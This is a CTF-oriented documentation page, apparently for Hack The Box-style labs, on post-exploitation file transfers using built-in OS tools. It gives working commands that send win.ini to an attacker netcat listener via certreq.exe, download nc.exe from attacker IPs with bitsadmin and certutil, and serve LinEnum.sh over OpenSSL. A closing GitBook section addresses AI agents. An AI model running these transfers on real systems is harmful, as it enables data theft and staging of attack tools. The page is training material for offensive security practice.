> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/post-exploitation/file-transfers/lotl.md).

# LOTL

Use this page for living-off-the-land file transfers with built-in OS tools.

These methods avoid extra binaries and lean on what the OS already provides.

{% hint style="info" %}
**Attacker** means your box, Pwnbox, or redirector.

**Compromised host** means the machine you already accessed.
{% endhint %}

### What is living off the land

Instead of uploading your own tooling, use binaries that already exist on the system.

On Windows, these are often called LOLBins.

Good references:

* **LOLBAS** — Windows binaries at `lolbas-project.github.io`
* **GTFOBins** — Linux binaries at `gtfobins.github.io`

Search for `download` or `upload` patterns when you need a native transfer path.

### Windows LOLBins

#### 1. `CertReq.exe` — upload

`CertReq.exe` normally handles certificate requests.

You can also abuse it to `POST` a file to a listener.

**Attacker — listen with Netcat**

```cmd
sudo nc -lvnp 8000
```

**Compromised host — send the file with `certreq.exe`**

```cmd
certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini
```

The file contents arrive in the Netcat session on the attacker.

#### 2. `Bitsadmin` — download

`Bitsadmin` usually downloads Windows updates in the background.

It can also download any file from the attacker.

**Compromised host — download with `bitsadmin`**

```cmd
# CMD
bitsadmin /transfer wcb /priority foreground http://10.10.15.66:8000/nc.exe C:\Users\htb-student\Desktop\nc.exe

# PowerShell version
Import-Module bitstransfer
Start-BitsTransfer -Source "http://10.10.10.32:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe"
```

#### 3. `Certutil` — download

`Certutil` is built into Windows.

It is heavily monitored and often flagged, so use it with care.

**Compromised host — download with `certutil`**

```cmd
certutil.exe -verifyctl -split -f http://10.10.10.32:8000/nc.exe
```

### Linux LOLBins

#### `OpenSSL` — encrypted file transfer

OpenSSL is installed on most Linux systems.

It can behave like Netcat with encryption built in.

**Attacker — create a certificate and serve the file**

```bash
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh
```

**Compromised host — connect and receive the file**

```bash
openssl s_client -connect 10.10.10.32:80 -quiet > LinEnum.sh
```

`s_server` runs the SSL server.

`s_client` connects and receives the file.

`-quiet` suppresses handshake noise.

Compared to plain Netcat, the traffic is encrypted in transit.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/post-exploitation/file-transfers/lotl.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
